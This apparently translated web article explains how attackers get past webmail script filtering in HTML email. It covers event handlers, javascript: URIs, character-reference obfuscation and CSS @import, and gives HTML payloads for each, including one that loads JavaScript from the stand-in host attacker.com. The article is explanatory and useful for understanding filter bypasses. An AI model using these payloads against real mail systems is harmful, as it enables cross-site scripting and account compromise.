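Given the dangers that scripts can pose, a WebMail system has every reason to disable scripts in HTML mail. The basic approach is to filter out of the HTML source any code that can cause a script to run, such as the script element; Hotmail does this better than anyone. Below are some common ways of bypassing script filtering, which many WebMail systems have still not fully fixed:
(1) In HTML, besides scripts placed inside a script element or pulled in through one, which run when the page loads, event attributes can also invoke scripts. In JavaScript, event attributes are called event handlers; they respond to a specific event on the page (such as a mouse click or a form submission) and trigger JavaScript code. The syntax is as follows:</P>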
<P> <tag attribute1 attribute2 onEventName="javascript code;"></P>
<P> For example:</P>
<P><body onload="alert('Javascript#1 is executed');"><br><a href="#" onclick="alert('Javascript#2 is executed');">Click here</a><br><form method="post" action="#" onsubmit="alert('Javascript#3 is executed');"><br><input type="submit" value="Submit"><br></form><br></body></P>
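<P> (2) A URI (Universal Resource Identifier) locates each kind of resource available on the Internet, such as HTML documents, images and sounds. The browser invokes the appropriate program to handle a resource according to the URI's resource type (URI scheme). If the resource type of an element's URI attribute value is set to javascript, JavaScript code can be invoked. The syntax is as follows; note that “;” must be used to separate JavaScript statements:</P>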
<P> <tag attribute="javascript:javascript-code;"></P>
<P> For example:</P>
<P><body background="javascript:alert('Javascript#1 is executed');"><br><a href="javascript:alert('Javascript#2 is executed');">Click here</a><br><form method="post" action="javascript:alert('Javascript#3 is executed');"><br><input type="submit" value="Submit"><br></form><br><img src="javascript:alert('Javascript#4 is executed');"><br></body></P>
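<P> (3) For hardware, software or other reasons, some rare or special characters cannot be typed or displayed correctly on an HTML page. To solve this, HTML can use SGML character references. A character reference is an encoding-independent mechanism for specifying any character in the document character set; it begins with “&” and ends with “;”. There are two forms: numeric character references and character entity references. The syntax of a numeric character reference is “&#D;” (D is a decimal number), or “&#xH;” or “&#XH;” (H is a hexadecimal number). For example, “&#65;” and “&#x41;” represent the letter “A”, and “&#27700;” and “&#x6C34;” represent the Chinese character “水”.</P>
<P> An attacker replaces some characters in the HTML with numeric character references, which evades the WebMail system's script filtering. Note that element and attribute names cannot be written as character references. For example:</P>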
<P><body><br><img lowsrc="j&#97;vas&#67;ript:alert('Javascript#1 is executed')"><br><a href="&#x6a;av&#x41;s&#67;ript&#x3a;ale&#x72;t('Javascript#2<br>&#x69;&#x73 executed')">Click her&#x65;</a><br><form method="post" action="javascript:alert('Javascript#3 is <br>executed')"><br><input type="&#x53;ubmit" value="Submit"><br></form><br></body></P>
<P> (4) “Style sheet” is short for Cascading Style Sheet (CSS). It is used to control, enhance or unify the styling of a web page (fonts, colours and so on) and separates style information from page content. Inside an HTML style tag, an @import declaration can import a style sheet. However, if the resource type or the content of the imported resource is javascript, Internet Explorer will still execute it.<br><br>For example: <style type="text/css"><br><!--<br>@import url(javascript:alert('Javascript#1 is executed'));<br>@import url(<a target="_blank" href=http://www.attacker.com/js.css>http://www.attacker.com/js.css</a>);<br>--><br></style></P>
<P> The content of <a target="_blank" href=http://www.attacker.com/js.css>http://www.attacker.com/js.css</a> is as follows:</P>
<P>@import url(javascript:alert('Javascript#2 is executed'));<br>@import url(javascript:eval(String.fromCharCode<br>(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,<br>108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));</P>
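<P> The ways of bypassing a WebMail system's script filtering go far beyond those described above. For example, someone once found that changing the “<script>” tag to “<_a<script>” or “<<script>” bypassed Yahoo mail's filter; Yahoo fixed this hole only recently. </span><br></P></font></div>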
<div></div>
</div><div id="Message" class="Message"></div></font></div>
</td>
</td>
</tr>
</table>
<table width="778" border="0" align="center" cellpadding="0" cellspacing="0" class="tableborder">
<tr>
<td height="60" align="center" class="tablebody1">
Copyright © 2005--2008 中国建站之家. All rights reserved.
</td>
</table>
</body>
</html>